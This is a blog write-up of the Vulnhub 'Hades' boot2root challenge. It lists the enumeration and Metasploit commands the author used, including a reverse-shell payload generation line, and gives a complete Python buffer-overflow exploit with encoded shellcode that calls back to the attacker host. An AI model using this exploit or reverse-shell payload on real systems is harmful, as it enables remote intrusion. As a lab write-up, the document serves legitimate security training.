About a month ago, Vulnhub released a boot2root image built by Lok_Sigma called Hades. The box promised to be full of annoyances and it delivered them in droves. Requiring a combination of exploit development, reverse engineering and some out of the box thinking, I really enjoyed this challenge. I decided to share my solution now that the competition is over. It goes without saying this post has a lot of SPOILERS!

Big thanks go out to the Vulnhub team for the awesome work they do. Follow @vulnhub on Twitter to keep up with the latest releases.

If you want to tackle Hades yourself, you can grab a copy of the machine here.

Keep on sploiting,

norsec0de

Commands Used

# Host Discovery
netdiscover -r 10.0.0.0/24

# Service Enumeration
nmap -v -sS -T4 -n -p- 10.0.0.129 && us -mU -v -p 1-65535 10.0.0.129

# Base64 Decryption
base64 -d ssh-hades > hades.bin

# Pattern Creation
/opt/metasploit-framework/tools/pattern_create 1000

# Offset Search
/opt/metasploit-framework/tools/pattern_offset.rb Af7A
/opt/metasploit-framework/tools/pattern_offset.rb 5Af6
/opt/metasploit-framework/tools/pattern_offset.rb 0x34654133

# Finding Assembly Shellcode
/opt/metasploit-framework/tools/metasm_shell.rb
metasm> jmp $esp+80

# Reverse Shell Payload
msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python

# Improved Shell
python -c "import pty; pty.spawn('/bin/sh')"

# File Decryption
openssl enc -d -aes-256-cbc -in flag.txt.enc -out flag.txt -pass file:key_file

Finished Exploit - Hades

#!/usr/bin/env python

import socket, struct

target = '10.0.0.129'
port = 65535

# Shellcode
# msfpayload linux/x86/shell_reverse_tcp LHOST=10.0.0.130 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -b \x00\x0a\x0d -t python
# [*] x86/shikata_ga_nai succeeded with size 95 (iteration=1)

buf =  ""
buf += "\xda\xc7\xd9\x74\x24\xf4\x5d\xba\xc4\xe0\xc2\x40\x2b"
buf += "\xc9\xb1\x12\x83\xed\xfc\x31\x55\x13\x03\x91\xf3\x20"
buf += "\xb5\x28\x2f\x53\xd5\x19\x8c\xcf\x70\x9f\x9b\x11\x34"
buf += "\xf9\x56\x51\xa6\x5c\xd9\x6d\x04\xde\x50\xeb\x6f\xb6"
buf += "\x68\x0b\x90\xc4\x05\x09\x90\xd9\x89\x84\x71\x69\x57"
buf += "\xc7\x20\xda\x2b\xe4\x4b\x3d\x86\x6b\x19\xd5\x36\x43"
buf += "\xed\x4d\x21\xb4\x73\xe4\xdf\x43\x90\xa4\x4c\xdd\xb6"
buf += "\xf8\x78\x10\xb8"

# Buffer
#buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B'
buffer = '\x90'*11
buffer += buf
buffer += '\x90'*(131-95-11)
buffer += '\xeb\x4e\x90\x90' # esp - 0x2c
buffer += 'F'*(167-4-131)
buffer += 'B'*4 # ebp
buffer += struct.pack("<L",0x08048694) # eip
buffer += 'D'*(1000-4-4-167)

# Connect and send payload
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(buffer)
data = s.recv(1024)
s.close()